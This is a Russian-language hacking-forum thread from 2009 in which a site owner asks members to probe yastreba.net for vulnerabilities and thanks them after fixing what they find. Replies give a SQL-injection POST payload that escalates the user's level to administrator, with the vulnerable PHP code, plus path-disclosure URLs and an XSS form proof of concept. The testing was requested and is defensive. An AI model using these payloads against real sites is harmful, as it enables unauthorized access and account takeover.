ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проверьте на уязвимости www.yastreba.net
  #1  
Старый 15.03.2009, 19:09
Аватар для uastrebv
uastrebv
Новичок
Регистрация: 13.03.2009
Сообщений: 5
Провел на форуме:
25090

Репутация: 0
По умолчанию Проверьте на уязвимости www.yastreba.net

сайт www.yastreba.net

Последний раз редактировалось uastrebv; 16.03.2009 в 12:30..
 
Ответить с цитированием

  #2  
Старый 16.03.2009, 01:47
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

SQL-INJ
Уязвимый скрипт: settings.php
Часть запроса (POST): set_show_icon=1',level='4
Уязвимый кусок кода:
PHP код:
if (isset($_POST['save'])){

if (isset(
$_POST['set_show_icon']) && ($_POST['set_show_icon']==|| $_POST['set_show_icon']==|| $_POST['set_show_icon']==0))
{
$user['set_show_icon']=$_POST['set_show_icon'];
mysql_query("UPDATE `user` SET `set_show_icon` = '$user[set_show_icon]' WHERE `id` = '$user[id]' LIMIT 1");
}
else 
$err='Ошибка режима показа иконок'
Как видно - нет нормальной проверки, для безопасной проверки используйте is_numeric, либо intval.

Пример:
http://www.yastreba.net/info.php?id=108
Цитата:
Главный Администратор
-----------
А далее можно установить привелегии через "Восстановление привелегий" из админки, таким образом получив полный доступ к сайту.

Последний раз редактировалось BlackSun; 16.03.2009 в 01:52..
 
Ответить с цитированием

  #3  
Старый 16.03.2009, 12:39
Аватар для uastrebv
uastrebv
Новичок
Регистрация: 13.03.2009
Сообщений: 5
Провел на форуме:
25090

Репутация: 0
По умолчанию

Цитата:
Сообщение от BlackSun  
SQL-INJ
Уязвимый скрипт: settings.php
Часть запроса (POST): set_show_icon=1',level='4
Уязвимый кусок кода:
PHP код:
if (isset($_POST['save'])){

if (isset(
$_POST['set_show_icon']) && ($_POST['set_show_icon']==|| $_POST['set_show_icon']==|| $_POST['set_show_icon']==0))
{
$user['set_show_icon']=$_POST['set_show_icon'];
mysql_query("UPDATE `user` SET `set_show_icon` = '$user[set_show_icon]' WHERE `id` = '$user[id]' LIMIT 1");
}
else 
$err='Ошибка режима показа иконок'
Как видно - нет нормальной проверки, для безопасной проверки используйте is_numeric, либо intval.

Пример:
http://www.yastreba.net/info.php?id=108


-----------
А далее можно установить привелегии через "Восстановление привелегий" из админки, таким образом получив полный доступ к сайту.
__________________________________
исправлено

Последний раз редактировалось uastrebv; 16.03.2009 в 12:45..
 
Ответить с цитированием

  #4  
Старый 16.03.2009, 21:02
Аватар для dotsenko
dotsenko
Новичок
Регистрация: 04.06.2007
Сообщений: 9
Провел на форуме:
173386

Репутация: 26
Отправить сообщение для dotsenko с помощью ICQ
По умолчанию

если нету юзер агента у браузера
то выдает такое
Notice: Undefined index: HTTP_USER_AGENT in /[вырезано]/settings.php on line 27

Последний раз редактировалось BlackSun; 16.03.2009 в 21:34.. Причина: пути не палим
 
Ответить с цитированием

  #5  
Старый 16.03.2009, 22:03
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Раскрытие путей:
http://www.yastreba.net/loads/?d[]=
http://www.yastreba.net/loads/?d=Fotoshop%2FSHrifty&f[]=100908gyp.zip

Или вставляем неразрешенные символы в идентификатор сессии
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /[bla/bla/bla]/sess.php on line 3

XSS/XSRF
http://www.yastreba.net/users.php?go

Мини-сплойт:
Код:
<form action='http://www.yastreba.net/users.php?go' method='post'>
<input name="usearch" type="text" value='"><script>alert()</script>' />
<input type='submit'>
</form>

Последний раз редактировалось oRb; 16.03.2009 в 22:07..
 
Ответить с цитированием

  #6  
Старый 17.03.2009, 12:33
Аватар для uastrebv
uastrebv
Новичок
Регистрация: 13.03.2009
Сообщений: 5
Провел на форуме:
25090

Репутация: 0
По умолчанию

спасибо! Исправлено.
 
Ответить с цитированием

  #7  
Старый 18.03.2009, 01:51
Аватар для TR0J@N
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774

Репутация: 127
Отправить сообщение для TR0J@N с помощью ICQ
Exclamation

В http://www.yastreba.net/users.php вывалилась ошибка!

Код:
Parse error: syntax error, unexpected T_ECHO in /[del]/users.php on line 163

Последний раз редактировалось BlackSun; 18.03.2009 в 02:11.. Причина: ну сколько повторять то, что пути не палим?
 
Ответить с цитированием

  #8  
Старый 18.03.2009, 16:35
Аватар для uastrebv
uastrebv
Новичок
Регистрация: 13.03.2009
Сообщений: 5
Провел на форуме:
25090

Репутация: 0
По умолчанию

Цитата:
Сообщение от TR0J@N  
В http://www.yastreba.net/users.php вывалилась ошибка!

Код:
Parse error: syntax error, unexpected T_ECHO in /[del]/users.php on line 163
это была моя ошибка
 
Ответить с цитированием

  #9  
Старый 18.03.2009, 23:45
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Для тех, кто не читал правила раздела:
Цитата:
Дополнение к правилам.

Народ, это раздел Проверка на уязвимости, поэтому все найденные кривости дизайна и подобное - автору темы - в ПМ. Здесь выкладывайте только уязвимости.
 
Ответить с цитированием

  #10  
Старый 22.03.2009, 23:02
Аватар для uastrebv
uastrebv
Новичок
Регистрация: 13.03.2009
Сообщений: 5
Провел на форуме:
25090

Репутация: 0
По умолчанию

всем спасибо за помощь.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проверьте чат на уязвимости MatroSKIN Чаты 9 13.07.2006 11:53
Проверьте мой чат на уязвимости пожалуйста! =) Divl Чаты 15 05.07.2006 20:51
Проверьте чат на уязвимости (chat.berdyansk.net) frestker Чаты 13 29.04.2006 14:58
Создал чат, проверьте на уязвимости! Divl Чаты 13 02.09.2005 05:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ